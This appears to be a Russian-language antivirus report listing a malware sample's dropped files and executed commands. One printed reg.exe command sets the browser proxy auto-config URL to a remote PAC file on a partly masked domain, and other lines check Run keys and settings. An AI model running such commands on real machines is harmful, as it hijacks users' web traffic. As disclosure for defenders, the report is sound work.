Техническая информация
- %TEMP%\07QS5JXJ.bat
- C:\Users\hellPro.exe
- %TEMP%\07QS5JXJ.bat
- 'C:\Users\hellPro.exe'
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /d "http://19#.###.#.networkinsper.com:9999/dw.pac" /f
- '<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- '<SYSTEM32>\findstr.exe' /i /c:"C:\Users\Update.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\07QS5JXJ.bat" "C:\Users\hellPro.exe" "
- '<SYSTEM32>\reg.exe' query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
- '<SYSTEM32>\findstr.exe' /i /c:"http://19#.###.#.networkinsper.com:9999/dw.pac"